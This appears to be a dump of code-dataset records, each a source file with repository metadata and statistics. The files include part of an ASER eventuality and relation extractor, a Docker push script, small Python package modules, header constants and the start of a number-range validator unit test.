    if relation_output_format == "Relation":
        para_relations = sorted(rid2relation.values(), key=lambda r: r.rid)
    elif relation_output_format == "triplet":
        para_relations = sorted(
            chain.from_iterable(relation.to_triplets() for relation in rid2relation.values())
        )
    return eventualities, para_relations
def extract_from_text(
    self,
    text,
    eventuality_output_format="Eventuality",
    relation_output_format="Relation",
    in_order=True,
    annotators=None,
    **kw
):
    """ Extract both eventualities and relations from a raw text.

    The text is parsed with CoreNLP via ``self.parse_text`` and the parsed
    result is forwarded to ``self.extract_from_parsed_result``.

    :param text: a raw text
    :type text: str
    :param eventuality_output_format: which format to return eventualities, "Eventuality" or "json"
    :type eventuality_output_format: str (default = "Eventuality")
    :param relation_output_format: which format to return relations, "Relation" or "triplet"
    :type relation_output_format: str (default = "Relation")
    :param in_order: whether the returned order follows the input token order
    :type in_order: bool (default = True)
    :param annotators: annotators for corenlp, please refer to https://stanfordnlp.github.io/CoreNLP/annotators.html
    :type annotators: Union[List, None] (default = None)
    :param kw: other parameters
    :type kw: Dict[str, object]
    :return: the extracted eventualities and relations
    :rtype: Tuple[Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]], Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]]

    .. highlight:: python
    .. code-block:: python

        Input:
            "My army will find your boat. In the meantime, I'm sure we could find you suitable accommodations."

        Output:
            ([[my army will find you boat],
              [i be sure, we could find you suitable accommodation]],
             [[],
              [(7d9ea9023b66a0ebc167f0dbb6ea8cd75d7b46f9, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Co_Occurrence': 1.0})],
              [(8540897b645962964fd644242d4cc0032f024e86, 25edad6781577dcb3ba715c8230416fb0d4c45c4, {'Synchronous': 1.0})]])
    """
    # Validate output formats before spending time on parsing.
    if eventuality_output_format not in ["Eventuality", "json"]:
        raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
    if relation_output_format not in ["Relation", "triplet"]:
        raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")

    parsed_result = self.parse_text(text, annotators=annotators)
    return self.extract_from_parsed_result(
        parsed_result,
        eventuality_output_format=eventuality_output_format,
        relation_output_format=relation_output_format,
        in_order=in_order,
        **kw
    )
class SeedRuleASERExtractor(BaseASERExtractor):
    """ ASER Extractor based on rules to extract both eventualities and relations (for ASER v1.0)
    """

    def __init__(self, corenlp_path="", corenlp_port=0, **kw):
        """ Build the seed-rule extractor on top of a CoreNLP server.

        :param corenlp_path: corenlp path
        :type corenlp_path: str (default = "")
        :param corenlp_port: corenlp port
        :type corenlp_port: int (default = 0)
        :param kw: other parameters (e.g., "annotators")
        :type kw: Dict[str, object]
        """
        if "annotators" not in kw:
            kw["annotators"] = list(ANNOTATORS)
        # This extractor works on dependency parses: drop the constituency
        # "parse" annotator and make sure "depparse" is requested.
        if "parse" in kw["annotators"]:
            # BUGFIX: list.pop() takes an index, not a value — use remove().
            kw["annotators"].remove("parse")
        if "depparse" not in kw["annotators"]:
            # BUGFIX: the key is "annotators"; the original wrote
            # kw["annotator"], which would raise KeyError here.
            kw["annotators"].append("depparse")
        super().__init__(corenlp_path, corenlp_port, **kw)
        from .rule import CLAUSE_WORDS
        self.eventuality_extractor = SeedRuleEventualityExtractor(
            corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port, skip_words=CLAUSE_WORDS, **kw
        )
        self.relation_extractor = SeedRuleRelationExtractor(**kw)
class DiscourseASERExtractor(BaseASERExtractor):
    """ ASER Extractor based on discourse parsing to extract both eventualities and relations (for ASER v2.0)
    """

    def __init__(self, corenlp_path="", corenlp_port=0, **kw):
        """ Build the discourse-based extractor on top of a CoreNLP server.

        :param corenlp_path: corenlp path
        :type corenlp_path: str (default = "")
        :param corenlp_port: corenlp port
        :type corenlp_port: int (default = 0)
        :param kw: other parameters (e.g., "annotators")
        :type kw: Dict[str, object]
        """
        if "annotators" not in kw:
            kw["annotators"] = list(ANNOTATORS)
        # This extractor needs constituency parses: drop "depparse" and make
        # sure "parse" is requested (the mirror of SeedRuleASERExtractor).
        if "depparse" in kw["annotators"]:
            # BUGFIX: was kw["annotator"].pop("depparse") — wrong key, and
            # list.pop() takes an index, not a value; remove by value instead.
            kw["annotators"].remove("depparse")
        if "parse" not in kw["annotators"]:
            kw["annotators"].append("parse")
        super().__init__(corenlp_path, corenlp_port, **kw)
        self.eventuality_extractor = DiscourseEventualityExtractor(
            corenlp_path=self.corenlp_path, corenlp_port=self.corenlp_port, **kw
        )
        self.relation_extractor = DiscourseRelationExtractor(**kw)

    def extract_from_parsed_result(
        self,
        parsed_result,
        eventuality_output_format="Eventuality",
        relation_output_format="Relation",
        in_order=True,
        **kw
    ):
        """ Extract both eventualities and relations from a parsed result.

        :param parsed_result: the parsed result returned by corenlp
        :type parsed_result: List[Dict[str, object]]
        :param eventuality_output_format: which format to return eventualities, "Eventuality" or "json"
        :type eventuality_output_format: str (default = "Eventuality")
        :param relation_output_format: which format to return relations, "Relation" or "triplet"
        :type relation_output_format: str (default = "Relation")
        :param in_order: whether the returned order follows the input token order
        :type in_order: bool (default = True)
        :param kw: other parameters (e.g., syntax_tree_cache)
        :type kw: Dict[str, object]
        :return: the extracted eventualities and relations
        :rtype: Tuple[Union[List[List[aser.eventuality.Eventuality]], List[List[Dict[str, object]]], List[aser.eventuality.Eventuality], List[Dict[str, object]]], Union[List[List[aser.relation.Relation]], List[List[Dict[str, object]]], List[aser.relation.Relation], List[Dict[str, object]]]]
        """
        # Share one syntax-tree cache between the eventuality and relation
        # extractors so each sentence is parsed into a tree only once.
        if "syntax_tree_cache" not in kw:
            kw["syntax_tree_cache"] = dict()
        return super().extract_from_parsed_result(
            parsed_result,
            eventuality_output_format=eventuality_output_format,
            relation_output_format=relation_output_format,
            in_order=in_order,
            **kw
        )
# The following extractor can cover more eventualities but the semantic meaning may be incomplete.
# class DiscourseASERExtractor(BaseASERExtractor):
# def __init__(self, corenlp_path="", corenlp_port=0, **kw):
# super().__init__(corenlp_path, corenlp_port, **kw)
# self.eventuality_extractor = SeedRuleEventualityExtractor(**kw)
# self.conn_extractor = ConnectiveExtractor(**kw)
# self.argpos_classifier = ArgumentPositionClassifier(**kw)
# self.ss_extractor = SSArgumentExtractor(**kw)
# self.ps_extractor = PSArgumentExtractor(**kw)
# self.explicit_classifier = ExplicitSenseClassifier(**kw)
# def _extract_eventualities_from_clause(self, sent_parsed_result, clause):
# len_clause = len(clause)
# idx_mapping = {j: i for i, j in enumerate(clause)}
# indices_set = set(clause)
# clause_parsed_result = {
# "text": "",
# "dependencies": [(idx_mapping[dep[0]], dep[1], idx_mapping[dep[2]]) for dep in sent_parsed_result["dependencies"] \
# if dep[0] in indices_set and dep[2] in indices_set],
# "tokens": [sent_parsed_result["tokens"][idx] for idx in clause],
# "pos_tags": [sent_parsed_result["pos_tags"][idx] for idx in clause],
# "lemmas": [sent_parsed_result["lemmas"][idx] for idx in clause]}
# if "ners" in sent_parsed_result:
# clause_parsed_result["ners"] = [sent_parsed_result["ners"][idx] for idx in clause]
# if "mentions" in sent_parsed_result:
# clause_parsed_result["mentions"] = list()
# for mention in sent_parsed_result["mentions"]:
# start_idx = bisect.bisect_left(clause, mention["start"])
# if not (start_idx < len_clause and clause[start_idx] == mention["start"]):
# continue
# end_idx = bisect.bisect_left(clause, mention["end"]-1)
# if not (end_idx < len_clause and clause[end_idx] == mention["end"]-1):
# continue
# mention = copy(mention)
# mention["start"] = start_idx
# mention["end"] = end_idx+1
# clause_parsed_result["mentions"].append(mention)
# eventualities = self.eventuality_extractor.extract_from_parsed_result(
# clause_parsed_result, output_format="Eventuality", in_order=True)
# for eventuality in eventualities:
# for k, v in eventuality.raw_sent_mapping.items():
# eventuality.raw_sent_mapping[k] = clause[v]
# eventuality.eid = Eventuality.generate_eid(eventuality)
# return eventualities
# def _append_new_eventuaities_to_list(self, existed_eventualities, new_eventualities):
# len_existed_eventualities = len(existed_eventualities)
# for new_e in new_eventualities:
# is_existed = False
# for old_idx in range(len_existed_eventualities):
# old_e = existed_eventualities[old_idx]
# if old_e.eid == new_e.eid and old_e.raw_sent_mapping == new_e.raw_sent_mapping:
# is_existed = True
# break
# if not is_existed:
# existed_eventualities.append(new_e)
# def extract_eventualities_from_parsed_result(self, parsed_result,
# output_format="Eventuality", in_order=True, **kw):
# if output_format not in ["Eventuality", "json"]:
# raise NotImplementedError("Error: extract_from_parsed_result only supports Eventuality or json.")
# if not isinstance(parsed_result, (list, tuple, dict)):
# raise NotImplementedError
# if isinstance(parsed_result, dict):
# is_single_sent = True
# parsed_result = [parsed_result]
# else:
# is_single_sent = False
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# para_eventualities = [list() for _ in range(len(parsed_result))]
# para_clauses = self._extract_clauses(parsed_result, syntax_tree_cache)
# for sent_parsed_result, sent_clauses, sent_eventualities in zip(parsed_result, para_clauses, para_eventualities):
# for clause in sent_clauses:
# sent_eventualities.extend(self._extract_eventualities_from_clause(sent_parsed_result, clause))
# if in_order:
# if output_format == "json":
# para_eventualities = [[eventuality.encode(encoding=None) for eventuality in sent_eventualities] \
# for sent_eventualities in para_eventualities]
# if is_single_sent:
# return para_eventualities[0]
# else:
# return para_eventualities
# else:
# eid2eventuality = dict()
# for eventuality in chain.from_iterable(para_eventualities):
# eid = eventuality.eid
# if eid not in eid2eventuality:
# eid2eventuality[eid] = deepcopy(eventuality)
# else:
# eid2eventuality[eid].update(eventuality)
# if output_format == "Eventuality":
# eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
# elif output_format == "json":
# eventualities = sorted([eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()], key=lambda e: e["eid"])
# return eventualities
# def extract_relations_from_parsed_result(self, parsed_result, para_eventualities,
# output_format="Relation",
# in_order=True, **kw):
# if output_format not in ["Relation", "triplet"]:
# raise NotImplementedError("Error: extract_relations_from_parsed_result only supports Relation or triplet.")
# len_sentences = len(parsed_result)
# if len_sentences == 0:
# if in_order:
# return [list()]
# else:
# return list()
# similarity = kw.get("similarity", "simpson").lower()
# threshold = kw.get("threshold", 0.8)
# if threshold < 0.0 or threshold > 1.0:
# raise ValueError("Error: threshold should be between 0.0 and 1.0.")
# if similarity == "simpson":
# similarity_func = self._match_argument_eventuality_by_Simpson
# elif similarity == "jaccard":
# similarity_func = self._match_argument_eventuality_by_Jaccard
# elif similarity == "discourse":
# similarity_func = self._match_argument_eventuality_by_dependencies
# else:
# raise NotImplementedError("Error: extract_from_parsed_result only supports Simpson or Jaccard.")
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# para_relations = [list() for _ in range(2*len_sentences-1)]
# # replace sentences that contains no eventuality with empty sentences
# filtered_parsed_result = list()
# for sent_idx, (sent_parsed_result, sent_eventualities) in enumerate(zip(parsed_result, para_eventualities)):
# if len(sent_eventualities) > 0:
# relations_in_sent = para_relations[sent_idx]
# for e1_idx in range(len(sent_eventualities)-1):
# heid = sent_eventualities[e1_idx].eid
# for e2_idx in range(e1_idx+1, len(sent_eventualities)):
# teid = sent_eventualities[e2_idx].eid
# relations_in_sent.append(Relation(heid, teid, ["Co_Occurrence"]))
# filtered_parsed_result.append(sent_parsed_result)
# else:
# filtered_parsed_result.append(EMPTY_SENT_PARSED_RESULT) # empty sentence
# # filtered_parsed_result.append(sent_parsed_result)
# connectives = self.conn_extractor.extract(filtered_parsed_result, syntax_tree_cache)
# SS_connectives, PS_connectives = self.argpos_classifier.classify(filtered_parsed_result, connectives, syntax_tree_cache)
# SS_connectives = self.ss_extractor.extract(filtered_parsed_result, SS_connectives, syntax_tree_cache)
# PS_connectives = self.ps_extractor.extract(filtered_parsed_result, PS_connectives, syntax_tree_cache)
# connectives = self.explicit_classifier.classify(filtered_parsed_result, SS_connectives+PS_connectives, syntax_tree_cache)
# connectives.sort(key=lambda x: (x["sent_idx"], x["indices"][0] if len(x["indices"]) > 0 else -1))
# for connective in connectives:
# conn_indices = connective.get("indices", None)
# arg1 = connective.get("arg1", None)
# arg2 = connective.get("arg2", None)
# sense = connective.get("sense", None)
# if conn_indices and arg1 and arg2 and (sense and sense != "None"):
# arg1_sent_idx = arg1["sent_idx"]
# arg2_sent_idx = arg2["sent_idx"]
# relation_list_idx = arg1_sent_idx if arg1_sent_idx == arg2_sent_idx else arg1_sent_idx + len_sentences
# relations = para_relations[relation_list_idx]
# sent_parsed_result1, sent_eventualities1 = parsed_result[arg1_sent_idx], para_eventualities[arg1_sent_idx]
# sent_parsed_result2, sent_eventualities2 = parsed_result[arg2_sent_idx], para_eventualities[arg2_sent_idx]
# arg1_eventualities = [e for e in sent_eventualities1 if \
# similarity_func(sent_parsed_result1, arg1, e, threshold=threshold, conn_indices=conn_indices)]
# arg2_eventualities = [e for e in sent_eventualities2 if \
# similarity_func(sent_parsed_result2, arg2, e, threshold=threshold, conn_indices=conn_indices)]
# cnt = 0.0
# if len(arg1_eventualities) > 0 and len(arg2_eventualities) > 0:
# cnt = 1.0 / (len(arg1_eventualities) * len(arg2_eventualities))
# for e1 in arg1_eventualities:
# heid = e1.eid
# for e2 in arg2_eventualities:
# teid = e2.eid
# existed_relation = False
# for relation in relations:
# if relation.hid == heid and relation.tid == teid:
# relation.update({sense: cnt})
# existed_relation = True
# break
# if not existed_relation:
# relations.append(Relation(heid, teid, {sense: cnt}))
# if in_order:
# if output_format == "Relation":
# return para_relations
# elif output_format == "triplet":
# return [sorted(chain.from_iterable([r.to_triplets() for r in relations])) \
# for relations in para_relations]
# else:
# if output_format == "Relation":
# rid2relation = dict()
# for relation in chain(*para_relations):
# if relation.rid not in rid2relation:
# rid2relation[relation.rid] = deepcopy(relation)
# else:
# rid2relation[relation.rid].update(relation)
# return sorted(rid2relation.values(), key=lambda r: r.rid)
# if output_format == "triplet":
# return sorted([r.to_triplets() for relations in para_relations for r in relations])
# def extract_from_parsed_result(self, parsed_result,
# eventuality_output_format="Eventuality",
# relation_output_format="Relation",
# in_order=True, **kw):
# if eventuality_output_format not in ["Eventuality", "json"]:
# raise NotImplementedError("Error: extract_eventualities only supports Eventuality or json.")
# if relation_output_format not in ["Relation", "triplet"]:
# raise NotImplementedError("Error: extract_relations only supports Relation or triplet.")
# if not isinstance(parsed_result, (list, tuple, dict)):
# raise NotImplementedError
# if isinstance(parsed_result, dict):
# is_single_sent = True
# parsed_result = [parsed_result]
# else:
# is_single_sent = False
# syntax_tree_cache = kw.get("syntax_tree_cache", dict())
# len_sentences = len(parsed_result)
# para_eventualities = [list() for _ in range(len_sentences)]
# para_relations = [list() for _ in range(2*len_sentences-1)]
# connectives = self.conn_extractor.extract(parsed_result, syntax_tree_cache)
# SS_connectives, PS_connectives = self.argpos_classifier.classify(parsed_result, connectives, syntax_tree_cache)
# SS_connectives = self.ss_extractor.extract(parsed_result, SS_connectives, syntax_tree_cache)
# PS_connectives = self.ps_extractor.extract(parsed_result, PS_connectives, syntax_tree_cache)
# connectives = self.explicit_classifier.classify(parsed_result, SS_connectives+PS_connectives, syntax_tree_cache)
# connectives.sort(key=lambda x: (x["sent_idx"], x["indices"][0] if len(x["indices"]) > 0 else -1))
# for connective in connectives:
# conn_indices = connective.get("indices", None)
# arg1 = connective.get("arg1", None)
# arg2 = connective.get("arg2", None)
# sense = connective.get("sense", None)
# if conn_indices and arg1 and arg2:
# arg1_sent_idx = arg1["sent_idx"]
# arg2_sent_idx = arg2["sent_idx"]
# senses = []
# if arg1_sent_idx == arg2_sent_idx:
# senses.append("Co_Occurrence")
# if sense and sense != "None":
# senses.append(sense)
# if len(senses) == 0:
# continue
# relation_list_idx = arg1_sent_idx if arg1_sent_idx == arg2_sent_idx else arg1_sent_idx + len_sentences
# relations = para_relations[relation_list_idx]
# sent_parsed_result1, sent_eventualities1 = parsed_result[arg1_sent_idx], para_eventualities[arg1_sent_idx]
# sent_parsed_result2, sent_eventualities2 = parsed_result[arg2_sent_idx], para_eventualities[arg2_sent_idx]
# arg1_eventualities = self._extract_eventualities_from_clause(sent_parsed_result1, arg1["indices"])
# arg2_eventualities = self._extract_eventualities_from_clause(sent_parsed_result2, arg2["indices"])
# self._append_new_eventuaities_to_list(sent_eventualities1, arg1_eventualities)
# self._append_new_eventuaities_to_list(sent_eventualities2, arg2_eventualities)
# cnt = 0.0
# if len(arg1_eventualities) > 0 and len(arg2_eventualities) > 0:
# cnt = 1.0 / (len(arg1_eventualities) * len(arg2_eventualities))
# for e1 in arg1_eventualities:
# heid = e1.eid
# for e2 in arg2_eventualities:
# teid = e2.eid
# is_existed = False
# for relation in relations:
# if relation.hid == heid and relation.tid == teid:
# relation.update({sense: cnt for sense in senses})
# is_existed = True
# break
# if not is_existed:
# relations.append(Relation(heid, teid, {sense: cnt for sense in senses}))
# if in_order:
# if eventuality_output_format == "json":
# para_eventualities = [[eventuality.encode(encoding=None) for eventuality in sent_eventualities] \
# for sent_eventualities in para_eventualities]
# if relation_output_format == "triplet":
# relations = [list(chain.from_iterable([relation.to_triplet() for relation in sent_relations])) \
# for sent_relations in para_relations]
# if is_single_sent:
# return para_eventualities[0], para_relations[0]
# else:
# return para_eventualities, para_relations
# else:
# eid2eventuality = dict()
# for eventuality in chain.from_iterable(para_eventualities):
# eid = eventuality.eid
# if eid not in eid2eventuality:
# eid2eventuality[eid] = deepcopy(eventuality)
# else:
# eid2eventuality[eid].update(eventuality)
# if eventuality_output_format == "Eventuality":
# eventualities = sorted(eid2eventuality.values(), key=lambda e: e.eid)
# elif eventuality_output_format == "json":
# eventualities = sorted([eventuality.encode(encoding=None) for eventuality in eid2eventuality.values()], key=lambda e: e["eid"])
# rid2relation = dict()
# for relation in chain.from_iterable(para_relations):
# if relation.rid not in rid2relation:
# rid2relation[relation.rid] = deepcopy(relation)
# else:
# rid2relation[relation.rid].update(relation)
# if relation_output_format == "Relation":
# relations = sorted(rid2relation.values(), key=lambda r: r.rid)
# elif relation_output_format == "triplet":
# relations = sorted(chain.from_iterable([relation.to_triplets() for relation in rid2relation.values()]))
# return eventualities, relations
# def _extract_clauses(self, parsed_result, syntax_tree_cache):
# para_arguments = [set() for _ in range(len(parsed_result))]
# connectives = self.conn_extractor.extract(parsed_result, syntax_tree_cache)
# para_connectives = [set() for _ in range(len(parsed_result))]
# for connective in connectives:
# sent_idx, indices = connective["sent_idx"], tuple(connective["indices"])
# para_connectives[sent_idx].add(indices)
# for sent_idx, sent_parsed_result in enumerate(parsed_result):
# sent_connectives = para_connectives[sent_idx]
# sent_arguments = para_arguments[sent_idx]
# if sent_idx in syntax_tree_cache:
# syntax_tree = syntax_tree_cache[sent_idx]
# else:
# syntax_tree = syntax_tree_cache[sent_idx] = SyntaxTree(sent_parsed_result["parse"])
# # more but slower
# # for indices in powerset(sent_connectives):
# # indices = set(chain.from_iterable(indices))
# # sent_arguments.update(get_clauses(sent_parsed_result, syntax_tree, sep_indices=indices))
# sent_arguments.update(get_clauses(sent_parsed_result, syntax_tree, sep_indices=set(chain.from_iterable(sent_connectives))))
# return para_arguments
| 49.217467
| 300
| 0.497569
| 5,214
| 56,354
| 5.185079
| 0.061373
| 0.055484
| 0.007546
| 0.008877
| 0.810246
| 0.780692
| 0.764232
| 0.7285
| 0.711004
| 0.701498
| 0
| 0.023124
| 0.393761
| 56,354
| 1,144
| 301
| 49.26049
| 0.768206
| 0.71601
| 0
| 0.347368
| 0
| 0
| 0.100933
| 0.017114
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068421
| false
| 0
| 0.036842
| 0
| 0.173684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
463308980a2e67fc68c91f6ea9ec29d55318c067
| 63
|
py
|
Python
|
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
docker/runner/node/0.10.37/push.py
|
urodoz/sailfish-runner
|
1b33da8be335c0bf1e235a50ad36f60f95521bfc
|
[
"MIT"
] | null | null | null |
"""Push the sailfish-node 0.10.37 image to the Docker registry."""
import subprocess

# Use subprocess.run with an argument list instead of os.system with a shell
# string: no shell is involved, so the command cannot be re-interpreted.
# The return code is intentionally not checked, matching the original
# os.system call, whose status was ignored.
subprocess.run(["docker", "push", "urodoz/sailfish-node:0.10.37"])
| 31.5
| 53
| 0.777778
| 12
| 63
| 4.083333
| 0.916667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084746
| 0.063492
| 63
| 2
| 53
| 31.5
| 0.745763
| 0
| 0
| 0
| 0
| 0
| 0.625
| 0.4375
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 6
|
466cded2ac47079ec29747cfce95b64a10996154
| 67
|
py
|
Python
|
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
feature_extraction/__init__.py
|
drakipovic/Bee
|
0e89a608fdeaad9594a09e93ed871c40008b7562
|
[
"MIT"
] | null | null | null |
from feature_extractor import FeatureExtractor, CppFeatureExtractor
| 67
| 67
| 0.925373
| 6
| 67
| 10.166667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059701
| 67
| 1
| 67
| 67
| 0.968254
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
46948f30f2ac0aac2b98a3292f0400a4ee918bee
| 184
|
py
|
Python
|
components/alibi-detect-server/adserver/constants.py
|
glindsell/seldon-core
|
a6992832b74ed71bbd3a91c48b5a79a5cee785b2
|
[
"Apache-2.0"
] | 1
|
2020-07-14T15:42:41.000Z
|
2020-07-14T15:42:41.000Z
|
components/alibi-detect-server/adserver/constants.py
|
glindsell/seldon-core
|
a6992832b74ed71bbd3a91c48b5a79a5cee785b2
|
[
"Apache-2.0"
] | 231
|
2020-08-10T08:38:42.000Z
|
2021-08-02T20:56:49.000Z
|
components/alibi-detect-server/adserver/constants.py
|
josephglanville/seldon-core
|
34ab0c33c55879ebe3ea3009ca64b0b47d18896c
|
[
"Apache-2.0"
] | null | null | null |
# HTTP header names understood by the Alibi-Detect server.
# Whether to include per-instance outlier scores in the response.
HEADER_RETURN_INSTANCE_SCORE = "Alibi-Detect-Return-Instance-Score"
# Whether to include per-feature outlier scores in the response.
HEADER_RETURN_FEATURE_SCORE = "Alibi-Detect-Return-Feature-Score"
# Which outlier type the detector should report.
HEADER_OUTLIER_TYPE = "Alibi-Detect-Outlier-Type"
| 46
| 67
| 0.842391
| 25
| 184
| 5.88
| 0.36
| 0.22449
| 0.258503
| 0.29932
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.048913
| 184
| 3
| 68
| 61.333333
| 0.84
| 0
| 0
| 0
| 0
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
d3b44a61b76b201fa497bfe2338de4744d1d6868
| 63
|
py
|
Python
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 21
|
2018-04-12T16:25:24.000Z
|
2022-02-14T23:05:43.000Z
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 8
|
2019-03-19T12:36:36.000Z
|
2020-11-11T12:46:00.000Z
|
src/stk/ea/crossover/__init__.py
|
stevenbennett96/stk
|
6e5af87625b83e0bfc7243bc42d8c7a860cbeb76
|
[
"MIT"
] | 5
|
2018-08-07T13:00:16.000Z
|
2021-11-01T00:55:10.000Z
|
from .crossers import * # noqa
from .records import * # noqa
| 21
| 31
| 0.68254
| 8
| 63
| 5.375
| 0.625
| 0.465116
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.222222
| 63
| 2
| 32
| 31.5
| 0.877551
| 0.142857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
d3bc83d947706d2d0590301ff140b0f4a38a64fe
| 45
|
py
|
Python
|
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
list_to_set.py
|
rivcah/100daysofPython
|
9536f687000008bb11d14e7f1607f2c438e77dca
|
[
"Unlicense"
] | null | null | null |
def setup_set(items):
    """Return a set containing the unique elements of *items*."""
    return set(items)
| 15
| 22
| 0.688889
| 7
| 45
| 4.285714
| 0.714286
| 0.533333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.155556
| 45
| 2
| 23
| 22.5
| 0.789474
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| false
| 0
| 0
| 0.5
| 0.5
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
31134eb7a34d5f2d500a9544df5b0d19258e6496
| 20,350
|
py
|
Python
|
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | 1
|
2018-11-05T12:00:51.000Z
|
2018-11-05T12:00:51.000Z
|
tests/app/validation/test_number_range_validator.py
|
nealedj/eq-survey-runner
|
b8e6cddae6068f6c8fd60e21d31d58aaa79bbb34
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock, patch
from wtforms.validators import ValidationError
from app.jinja_filters import format_number
from app.validation.error_messages import error_messages
from app.validation.validators import NumberRange
from app.forms.fields import get_number_field, CustomIntegerField
from app.data_model.answer_store import Answer, AnswerStore
# pylint: disable=no-member
@patch('app.jinja_filters.flask_babel.get_locale', Mock(return_value='en_GB'))
class TestNumberRangeValidator(unittest.TestCase):
"""
Number range validator uses the data, which is already known as integer
"""
def setUp(self):
    """Populate an AnswerStore with the answers the range tests read."""
    self.store = AnswerStore()
    fixtures = (
        ('set-minimum', 10),
        ('set-maximum', 20),
        ('set-maximum-cat', 'cat'),
    )
    for answer_id, value in fixtures:
        self.store.add(
            Answer(
                answer_id=answer_id,
                answer_instance=1,
                group_instance=1,
                value=value,
            )
        )
def tearDown(self):
    # Empty the store so answers do not leak between tests.
    self.store.clear()
def test_too_small_when_min_set_is_invalid(self):
    """A value below the configured minimum raises ValidationError."""
    form, field = Mock(), Mock()
    field.data = -10
    validate = NumberRange(minimum=0)
    with self.assertRaises(ValidationError) as context:
        validate(form, field)
    self.assertEqual(error_messages['NUMBER_TOO_SMALL'] % dict(min=0), str(context.exception))
def test_too_big_when_max_set_is_invalid(self):
    """A value above the configured maximum raises ValidationError."""
    form, field = Mock(), Mock()
    field.data = 10000000000
    validate = NumberRange(maximum=9999999999)
    with self.assertRaises(ValidationError) as context:
        validate(form, field)
    self.assertEqual(
        error_messages['NUMBER_TOO_LARGE'] % dict(max=format_number(9999999999)),
        str(context.exception)
    )
